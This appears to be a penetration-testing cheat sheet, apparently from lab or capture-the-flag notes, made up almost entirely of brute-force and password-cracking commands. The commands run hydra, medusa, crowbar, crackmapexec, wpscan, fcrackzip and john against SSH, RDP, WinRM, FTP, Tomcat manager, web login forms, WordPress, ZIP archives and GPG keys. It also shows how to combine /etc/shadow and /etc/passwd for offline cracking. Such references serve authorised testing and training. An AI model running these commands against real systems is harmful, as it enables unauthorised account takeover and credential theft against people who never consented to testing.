Bruteforce
Medusa
medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/adminTomcat GET:
hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/htmlRDP:
crowbar -b rdp -s <IP> -u <admin> -C rockyou.txt -n 1Evil-winrm:
crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txtSSH:
hydra -l <user> -P /usr/share/wordlists/rokyou.txt <ssh>://<IP> -s <port>
hydra -l <user> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -VHTTP-GET
hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>HTTP-POST
hydra <IP> http-form-post <"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN"> -l admin -P /usr/share/wordlists/rockyou.txt -vV -fFTP
hydra -l <user> -P /usr/share/wordlists/rockyou.txt -vV <IP> ftpZIP
fcrackzip -v -u -b -D -p /usr/share/wordlists/rockyou.txt secrets.zipUnshadow
/etc/shadow + /etc/passwd
# Grab both and do the following command
unshadow <passwd file> <shadow file> > unshadowed.txtWordPress
wpscan --url <IP> -U users.txt -P pass.txt
wpscan --url http://test.com/ASC
gpg2john tryhackme.asc > hash
john hash -w=/usr/share/wordlists/rockyou.txt
gpg —import tryhackme.asc # Enter the passphrase
gpg —decrypt credentials.pgpLast updated
Was this helpful?
